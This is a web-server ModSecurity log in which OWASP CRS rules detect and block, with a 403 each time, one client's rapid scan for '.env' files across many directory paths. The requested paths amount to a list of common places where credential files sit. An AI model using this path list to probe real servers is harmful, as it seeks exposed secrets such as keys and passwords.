[Mon May 11 18:06:43.489141 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/apps/.env"] [unique_id "agH-k4W8yzYoWG_eyCW6bQAAAUg"]
[Mon May 11 18:06:43.489382 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/apps/.env"] [unique_id "agH-k4W8yzYoWG_eyCW6bQAAAUg"]
[Mon May 11 18:06:43.489690 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-k4W8yzYoWG_eyCW6bQAAAUg"]
[Mon May 11 18:06:43.757367 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agH-k4W8yzYoWG_eyCW6bgAAAUg"]
[Mon May 11 18:06:43.757589 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agH-k4W8yzYoWG_eyCW6bgAAAUg"]
[Mon May 11 18:06:43.757887 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-k4W8yzYoWG_eyCW6bgAAAUg"]
[Mon May 11 18:06:44.020017 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/web/.env"] [unique_id "agH-lIW8yzYoWG_eyCW6cAAAAUg"]
[Mon May 11 18:06:44.020254 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/web/.env"] [unique_id "agH-lIW8yzYoWG_eyCW6cAAAAUg"]
[Mon May 11 18:06:44.020589 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-lIW8yzYoWG_eyCW6cAAAAUg"]
[Mon May 11 18:06:44.308709 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/site/.env"] [unique_id "agH-lIW8yzYoWG_eyCW6cgAAAUg"]
[Mon May 11 18:06:44.308934 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/site/.env"] [unique_id "agH-lIW8yzYoWG_eyCW6cgAAAUg"]
[Mon May 11 18:06:44.309240 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-lIW8yzYoWG_eyCW6cgAAAUg"]
[Mon May 11 18:06:44.563141 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/public/.env"] [unique_id "agH-lIW8yzYoWG_eyCW6cwAAAUg"]
[Mon May 11 18:06:44.563373 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/public/.env"] [unique_id "agH-lIW8yzYoWG_eyCW6cwAAAUg"]
[Mon May 11 18:06:44.563646 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-lIW8yzYoWG_eyCW6cwAAAUg"]
[Mon May 11 18:06:44.908381 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/admin/.env"] [unique_id "agH-lIW8yzYoWG_eyCW6dAAAAUg"]
[Mon May 11 18:06:44.908608 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/admin/.env"] [unique_id "agH-lIW8yzYoWG_eyCW6dAAAAUg"]
[Mon May 11 18:06:44.908895 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-lIW8yzYoWG_eyCW6dAAAAUg"]
[Mon May 11 18:06:45.199013 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agH-lYW8yzYoWG_eyCW6dQAAAUg"]
[Mon May 11 18:06:45.199238 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agH-lYW8yzYoWG_eyCW6dQAAAUg"]
[Mon May 11 18:06:45.199525 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-lYW8yzYoWG_eyCW6dQAAAUg"]
[Mon May 11 18:06:45.466880 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/server/.env"] [unique_id "agH-lYW8yzYoWG_eyCW6dgAAAUg"]
[Mon May 11 18:06:45.467110 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/server/.env"] [unique_id "agH-lYW8yzYoWG_eyCW6dgAAAUg"]
[Mon May 11 18:06:45.467417 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-lYW8yzYoWG_eyCW6dgAAAUg"]
[Mon May 11 18:06:45.727233 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/frontend/.env"] [unique_id "agH-lYW8yzYoWG_eyCW6eAAAAUg"]
[Mon May 11 18:06:45.727459 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/frontend/.env"] [unique_id "agH-lYW8yzYoWG_eyCW6eAAAAUg"]
[Mon May 11 18:06:45.727726 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-lYW8yzYoWG_eyCW6eAAAAUg"]
[Mon May 11 18:06:46.027896 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/src/.env"] [unique_id "agH-loW8yzYoWG_eyCW6eQAAAUg"]
[Mon May 11 18:06:46.028117 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/src/.env"] [unique_id "agH-loW8yzYoWG_eyCW6eQAAAUg"]
[Mon May 11 18:06:46.028437 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-loW8yzYoWG_eyCW6eQAAAUg"]
[Mon May 11 18:06:46.362380 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/core/.env"] [unique_id "agH-loW8yzYoWG_eyCW6egAAAUg"]
[Mon May 11 18:06:46.362599 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/core/.env"] [unique_id "agH-loW8yzYoWG_eyCW6egAAAUg"]
[Mon May 11 18:06:46.362920 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-loW8yzYoWG_eyCW6egAAAUg"]
[Mon May 11 18:06:46.695566 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/core/app/.env"] [unique_id "agH-loW8yzYoWG_eyCW6ewAAAUg"]
[Mon May 11 18:06:46.695799 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/core/app/.env"] [unique_id "agH-loW8yzYoWG_eyCW6ewAAAUg"]
[Mon May 11 18:06:46.696110 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-loW8yzYoWG_eyCW6ewAAAUg"]
[Mon May 11 18:06:46.974113 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/config/.env"] [unique_id "agH-loW8yzYoWG_eyCW6fQAAAUg"]
[Mon May 11 18:06:46.974381 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/config/.env"] [unique_id "agH-loW8yzYoWG_eyCW6fQAAAUg"]
[Mon May 11 18:06:46.974712 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-loW8yzYoWG_eyCW6fQAAAUg"]
[Mon May 11 18:06:47.281846 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/private/.env"] [unique_id "agH-l4W8yzYoWG_eyCW6fgAAAUg"]
